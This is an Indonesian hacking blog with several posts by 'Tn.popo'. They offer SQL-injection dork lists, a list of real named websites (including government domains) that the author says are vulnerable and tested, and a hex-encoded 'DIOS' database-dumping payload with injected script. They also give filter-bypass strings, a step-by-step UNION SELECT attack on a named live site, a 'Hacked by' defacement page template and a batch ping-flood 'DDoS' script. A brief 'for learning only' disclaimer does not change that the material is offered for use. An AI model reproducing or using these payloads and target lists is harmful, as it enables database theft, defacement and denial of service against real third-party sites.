Google Translet

Friday, March 19, 2021

Dork-Sqli-2021-popojago


Dork-SQL-Injection

By:Tn.popo-10/03/2021

Hai Semua, selamat datang di blog popojago, Pada Artikel yang kalian baca kali ini dengan judul Dork SQL injection Fresh, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.




view_items.php?id=
home.php?cat=
item_book.php?CAT=
www/index.php?page=
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
productlist.php?tid=
product-list.php?id=
onlinesales/product.php?product_id=
garden_equipment/Fruit-Cage/product.php?pr=
product.php?shopprodid=
product_info.php?products_id=
productlist.php?tid=
showsub.php?id=
productlist.php?fid=
products.php?cat=
products.php?cat=
product-list.php?id=
product.php?sku=
store/product.php?productid=
products.php?cat=
productList.php?cat=
product_detail.php?product_id=
product.php?pid=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
view/7/9628/1.html?reply=
product_details.php?prodid=
catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
view-event.php?id=
content.php?id=
book.php?id=
page/venue.php?id=
print.php?sid=
colourpointeducational/more_details.php?id=
print.php?sid=
browse/book.php?journalID=
section.php?section=
bookDetails.php?id=
profiles/profile.php?profileid=
event.php?id=
gallery.php?id=
category.php?CID=
corporate/newsreleases_more.php?id=
print.php?id=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
php?id= go.id
live-target:
Live target 1
Live-target-2
Live target 3
Sekian Artikel Dork SQL injection Fresh.
Terima kasih telah membaca artikel Dork SQL injection Fresh, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog popojago, saya harap agan berkunjung kembali kesini


Saturday, March 13, 2021

Kumpulan Web Vuln SQL 2021-popojago

web vuln sql 2021 

Web vuln sql 2021 -  Hai semua nya balik lagi di blog saya popojago,Saya akan menjelaskan apa itu sql injection SQL Injection adalah teknik yang menyalahgunakan celah keamanan yang ada pada lapisan basis data sebuah aplikasi. Celah ini terjadi ketika input dari pengguna tidak disaring secara benar, contohnya adalah kolom username yang seharusnya hanya diisi dengan huruf atau angka tapi malah diisi dengan karakter lain (seperti: – = ’) sehingga penyerang menggunakan celah tersebut dengan cara memasukan query dari SQL.
nah itu dia pengertia dari sql injection maka nya hati hati saat sql saya berikan kode kode sql
'+ORDER+BY+1--+- lalu UNION+SELECT+1,2,3,4,5--+- bisa liat tutor sebelum nya bagi kalian yang mau ngedump datbase bisa pake dios ini
dios :

concat(0x3C736372697074206C616E67756167653D226A617661736372697074223E616C657274282220496E6A65637420627920546E2E706F706F2E2022293B3C2F7363726970743E0D0A3C62723E3C68313E696E6A6563742062793A546E2E706F706F3C2F68313E0D0A3C736372697074207372633D2268747470733A2F2F63646E2E7261776769742E636F6D2F62756E676672616E676B692F6566656B73616C6A752F32613738303563372F6566656B2D73616C6A752E6A732220747970653D22746578742F6A617661736372697074223E3C2F7363726970743E0D0A3C617564696F206175746F706C61793D226175746F706C61792220636F6E74726F6C733D22636F6E74726F6C7322207372633D2268747470733A2F2F612E746F7034746F702E696F2F6D5F313839326A696B7077312E6D34612220747970653D22617564696F2F6D706567223E3C2F617564696F3E3C62723E,'<br>','<img src ="">',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))








                                                                  Web vuln sql 2021







Oiya jika ada web yang gk aktif ato udah di tutup bug nya hubungin saya bebas lewat mana kolom komentar bisa:v







-web vuln sql 2021

-https://meanmentor.com/category.php?id=1
-https://www.smtmax.com/category.php?id=2
-https://www.smtmax.com/category.php?id=15
yang ada dua itu memang dobel ya dan semua nya vuln:v
-http://www.meggieschneider.com/php/detail.php?id=48
-http://www.embryohotel.com/room-detail.php?id=1
-https://www.tiphone.co.id/media/detail.php?news_id=8
-https://equitytower.co.id/gallery-detail.php?id=16
-https://equitytower.co.id/news-event-detail.php?id=-21
Tuh dobel lagi tapi ID nya beda:v
-https://lembagaperlindungananaktomohon.or.id/gallery-detail.php?id=1
btw itu pihak nya udah saya hubungi dan tidak ada respon
-https://www.sanliman.com/detail.php?id=17
-https://www.suzuki.co.id/mysuzukistory/detail.php?id=155
yang bisa ngerjain call suzuki tuh pro banget lu:v
-https://dpr.go.id/detail.php?id=4
Canda Heker:v 😆😆😆😆
-https://jdih.halbarkab.go.id/detail.php?id=425
-http://www.theclassichotel.in/room-detail.php?id=61
-https://jdih.halbarkab.go.id/detail.php?id=779
btw itu beda ya ama yang sbelum nya liat aja ID nya:v
-http://www.kotatanpasampah.id/artikel-detail.php?id=2
-
-
  1. http://mypets.co.id/detailnews.php?id=15
  2. http://www.aringocomputer.com/product.php?id=17
  3. http://www.hasnurgroup.com/lowongan.php?id=1
  4. http://www.savalihotel.com/holiday-index.php?id=1
  5. http://krlmania.com/sinyal/read.php?id=2142
  6. http://rsiabundasuryatni.com/artikel.php?id=142
  7. http://home-klik.com/product_detail.php?id=112
  8. http://seputarkediri.com/health/seputar-kediri.php?id=145
  9. http://www.ptbnk.com/product/detail.php?id=1
  10. http://www.pdw-architects.com/news.php?id=26
  11. http://www.herjandi.com/article.php?id=21
  12. http://www.produkabe.com/majakani.php?id=bisnisviden
  13. http://pelitaindonesia.ac.id/hapusupload.php?id=116
  14. http://hikmakaryapersada.com/artikel.php?id=32
  15. http://www.krlmania.com/gado/read.php?id=703
  16. http://www.dblindonesia.com/loop/newsdetail.php?id=10994
  17. http://jagiradvertising.com/detail_produk.php?id=15
  18. http://www.kafispolgama.or.id/umum_detail.php?id=2
  19. http://www.indonesianship.com/beritaisi.php?ID=2582
  20. http://www.vivocondom.com/news-detail.php?id=1
  21. http://stasolar.com/kategori.php?id=6
  22. http://roboticsindonesia.com/blog-view.php?id=36
  23. http://www.kaoscouple-jakarta.com/readnews.php?id=16
  24. http://www.tiketpesawatkita.com/?id=nanaz/artikel.php?id=18
  25. http://www.imahseniman.com/room-detail.php?r=Junior


Inject by:Tn.popo
Nb:Jika eror 403 saat union haru di bypass jika udah di order by masih eror hapus koma di atas nya/hapus %27 okh iya bypass nya di bwah ya

/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/
Saat di bypass tidak muncul angka di depan angka id/depan %27 kita kasih and false contoh https://web nya.co.id/detail.php?id=13%27 and false +/*!union*/+/*!select*/+1,2,3,4,5,6,78--+- jelas lagi jika udah union select tapi angka ajaib tidak muncul kasih strip kek gini - di seblum ID contoh
https://web nya.co.id/detail.php?id=-13+UNION+SELECT+1,2,3,4,5,6,7--+- belum paham? tulis no wa kalian di bawah entar saya chat
btw yang saya kasih web nya udah di coba semua:v jangan bilang gk bisakecuali yang dpr awoakwoakwokawokowk
makasi untuk magelang1337


Salam Hekerr awoakwoakwoakwoka Canda Hacker:v



Tuesday, March 9, 2021

Cara buat Sc deface Sederhana

HALLO SAYA AKAN MEMBAGIKIAN TUTORIAL MEMBUAT SC DEFACE SEDERHANA






maap jika html nya tidak beraturan ok langsung aja ke tutor nya pertama siapin bahan dan alat ya
BAHAN DAN ALAT
1.nyali
2.gambar
3.lagu
ALAT
1.hp
2.text editor
sippp jka di atas udah di siapin ok pertama kita bikin gambar dulu di p4top.io tekan aja tulisan di bawah
nah tekan aja link di atas
di sana kita aploud gambar lalu ambil link nya  lalu simpan
jangan lupa juga di situ aploud file lagu juga lalu link di simpan juga next kita ke text editor
kita tulisin kode
<!--Hayoo mau ngapain om-->
<!--ngapain om liat liat-->
<html>
lalu stelah html kita tulisin kode

<head>
<title>Hacked by:Tn.popo</title>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
     <script language="javascript">alert(" Hacked by Tn.popo. ");</script>
lalu setlah script kita tulisin kode
<br>
</head>
<body bgcolor="black">
<br><center>
 <font face="New Rocker" size="7" color="red"><b>Hacked by Tn.popo.</font><br>
lalu kita tulisin kode
<br>
 <br>
 <img src="link gambar kalian taruh di sini"widht="100"height="200">
 <br>
 <br>
 <br>
 <audio autoplay="autoplay" controls="controls" src="link musik" type="audio/mpeg"></audio><br>
 <br>
lalu tulisin kode
<br>
 <center><font face="Shaxxdows Into Light"size="4"color="silver">PESAN</font></center>
<center><font face="Shadows Into Light"size="5"color="red">Hargai lah Orang tua mu Orang terdekat nya selagi ada <br>saya punya banyak teman dan sekarang kami berpisah<br>kami bermain bersama berpetualang bersama sekarang kami berpisah sedih pak rasa nya</font></center>
 <center><font face="Shaxxdows Into Light"size="4"color="silver">Ttd/.Tn.popo</font></center>
<br>
<br>
<br>
<br>
<br>
<center> <Font face="Amatic SC"Size="5"color="white">-Copyright©2021/Tn.popo</font></center>
<br>
<br>
<br>
<br>
<br>
<center>
nah kalian bisa edit pesan pesan di situ ok itu aja dari saya terimakasih untuk code lengkap nya
<!--Hayoo mau ngapain om-->
<!--ngapain om liat liat-->
<html>
<head>
<title>Hacked by:Tn.popo</title>
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
     <script language="javascript">alert(" Hacked by Tn.popo. ");</script>
<br>
</head>
<body bgcolor="black">
<br><center>
 <font face="New Rocker" size="7" color="red"><b>Hacked by Tn.popo.</font><br>
 <br>
 <br>
 <img src="link gambar kalian"widht="100"height="200">
 <br>
 <br>
 <br>
 <audio autoplay="autoplay" controls="controls" src="link musik" type="audio/mpeg"></audio><br>
 <br>
 <br>
 <center><font face="Shaxxdows Into Light"size="4"color="silver">PESAN</font></center>
<center><font face="Shadows Into Light"size="5"color="red">Hargai lah Orang tua mu Orang terdekat nya selagi ada <br>saya punya banyak teman dan sekarang kami berpisah<br>kami bermain bersama berpetualang bersama sekarang kami berpisah sedih pak rasa nya</font></center>
 <center><font face="Shaxxdows Into Light"size="4"color="silver">Ttd/.Tn.popo</font></center>
<br>
<br>
<br>
<br>
<br>
<center> <Font face="Amatic SC"Size="5"color="white">-Copyright©2021/Tn.popo</font></center>
<br>
<br>
<br>
<br>
<br>
<center>



ok kalian save file dengan extensi .html/index.html udah itu aja dari saya makasih

tt,d/Tn.popo

Sunday, March 7, 2021

Downloat sc deface keren

                            script deface  

ok kalian tinggal downloat file yang ada di bawah ini
tinggal downloat aja lalu kalian edit di sublime ato notepad
terserah mau di edit dimana script nya soal nya banyak apk 
text editor kalian bisa dwonaloat aja 


untuk file nya bisa downloat di tulisan di bawah ya...
Downloat di bawah om👇👇👇
Downloat di atas om☝☝



ok makaci om dah mampir
Tn.popo
undu diri
makasih 
comen ya


Wednesday, March 3, 2021

Tutorial Slq Injention Part 2 Tn.popo

                            Tutorial sql injection part 2






bahan bahan yang di gunakan adalah dios dan kode kode inject jadi langsung aja saya berikan tutor nya membuat dios dulu pertama masuk ke imgbb.com kalian tekan aja tulisan yang warna  biru kalian tekan tombol aploud

setelah itu kalian tinggal pilih file






kalian pilih gambar stelah itu tekan aj gambar nya otomatis langsung di aploud gambar nya






Kalian tekan Embed codes pilih tautan penuh html lalu laian copy aja link nya dan ke hxencode tekan aja tulisan warna biru







paste tautan penuh html yang tadi di buat di imgBB.com



kalian tambah kan kode <br> amati gambar



oke kita tambah kan <b1></b1> atao <b2></b2> atao <h1></h1> saya pake h1 ya tengah tengah h1 kasih tulisan tersrah kalo saya kasih tulisan inect by:Tn.popo



tinggal tekan tombol hack encode di awal kode nya kalian tambahkan 0x jadi nya  0x3C6120687265663D2268747470733A2F2F696D6762622E636F6D2F223E3C696D67207372633D2268747470733A2F2F692E6962622E636F2F713739387659762F32346332323532632D613263332D346330362D626363392D3865643035613265396435342D3430302D3430302E6769662220616C743D2232346332323532632D613263332D346330362D626363392D3865643035613265396435342D3430302D3430302220626F726465723D2230223E3C2F613E3C62723E3C68313E696E6A6563742062793A546E2E706F706F3C2F68313E


nah dios dah jadi next sql nya


SQL TUTOR

ok kalian cari web yang vuln di sini saya dah siapin link nya
https://www.pudak-scientific.com/detail_products.php?id=-5
kita cari angka terakhir eror
kalian kasih order by
https://www.pudak-scientific.com/detail_products.php?id=5+order+by+1--+-
belum eror
https://www.pudak-scientific.com/detail_products.php?id=5+order+by+2--+-
belum eror
https://www.pudak-scientific.com/detail_products.php?id=5+order+by+3--+-
belum eror
https://www.pudak-scientific.com/detail_products.php?id=-5+order+by+4--+-
belum eror
https://www.pudak-scientific.com/detail_products.php?id=5+order+by+5--+-
belum eror
https://www.pudak-scientific.com/detail_products.php?id=5+order+by+6--+-
 eror
kebertulan angka eror 7
jadi angka yang di pake buat union select 6
next union select
https://www.pudak-scientific.com/detail_products.php?id=5+union+select+1,2,3,4,5--+-
mengapa union nya sampe 5 karna angka eror terakhir 6 jadi yang di pake angka 5
lalu enter aja nanti ekuluar anga kek gambar di bawah ini




tu kan keluar kita cai angka nya yang muncul angka 2 di union ada angka 2 malka angka 2 nya di hapus
di tenah tengah angka 2 tempel dios




tu kn itu gambar bergerak/gif live terget nya bisa tekan tulisan warna bitu yang adsa tulisan live target  Live target
















Tuesday, March 2, 2021

script Ddos Attack Cmd

hallo kemabali lagi bersama saya Tn.popo

OK KALIAN LIAT GAMBARDI BAWAH YA 




jadi di bawah ini adalah kode kode nya

cukup copy paste ke notepad



@echo off

mode 100

title DDOS Coded by Tn.popo

cls

echo. 

echo  ./+o+/:.   /hNMms+` 

echo                           `omMMMMMMMMMmdMMd-   /:

echo                          .mMMMMMMMMMMMMMMN` `ymo.

echo                          mMMMd/-..-/oyMMMy  sMMM-

echo ..                       :MMMm         hMMd  :MMm`

echo `:+.                    sMMMh         .NMM+  `-`/

echo    oy-                  dMMMN`         `sNMd+//- 

echo     :My.                NMMMMh            .:-`   

echo      /MN/              `MMMMMMs                  

echo       hMMy`            -MMMMMMM+                 

echo       :MMMm-           /MMMMMMMM/                

echo       `MMMMMs`         oMMMMMMMMN`               

echo        NMMMMMNs-     -sMMMMMMMMMMs               

echo        mMMMMMMMMMmmmMMMMMMMMMMMMMd               

echo        dMMMMMMMMMMMMMMMMMMMMMMMMMd               

echo        yMMMMMMMMMMMMMMMMMNNNmNhmy/               

echo        :MMMMMMMMMMMMMMMMh -:`.```                

echo         sMMMMMMMMMMMMMMMh -:--++                 

echo          sMMMMMMMMMMMMMMMNNNNNM+                 

echo          hMMMMMMMMMMMMMMMMMMNy-                  

echo         .MMMM+NMMMMMMMMMmy+-                     

echo        .mMMMy`NMMM/::-.`                         

echo       +NMMMd:mMMMy                               

echo     :mMMMMd/MMMMMmhysso+/.                       

echo     mMMMMMMMMMMMMMMMMMMMMN.                      

echo     -hNMMMMMMMMMMMMMMMMMMm`                      

echo        .:/+syhdmNMd. ``..

echo.

echo       ---------------------

echo      / Ddos monster attack \

echo /------------------------------------\

echo  www.popojago.blogspot.com +

echo \------------------------------------/

echo.

echo /------------------------------------------------\

echo  Made-By  : afreno

echo  Facebook : www.facebook.com/afreno

echo  Site     : www.jagopopo.blogspot.com

echo \------------------------------------------------/

echo _______________________________________________________________________________

echo _________________________________________

echo {

echo Website = [http://afreno.freeoda.com

echo }

echo _________________________________________

echo The Quieter You Become

echo More Able You To Hear

echo [DDOS ATTACK]

echo [NO COPY]

echo Copyright

echo LuLMonstre

echo Muslim Fighter 007

echo Peace

echo _________________________________________

echo [CONTACT]

echo email: 085817691335

echo _________________________________________

echo Thanks to

echo   Jack Xploit

echo   <vianam

echo    masta 

echo    masta

echo    N-F404

echo    masta

echo    Ilmu padi 01

echo    dijit.gans

echo   najib

echo dan member Indonesian defacer^_^

echo dibuat tanggal= 2 maret 2021

echo.

set /p x=Website Target:

echo.

ping %x%

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

goto Next

:Next

echo.

echo.

echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 02

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS


oke iutu aja terimakasih 

save dile dengan nama ddos monster attack.bat dan pilih alfiles di bagian bawah




Tn.popo undur diri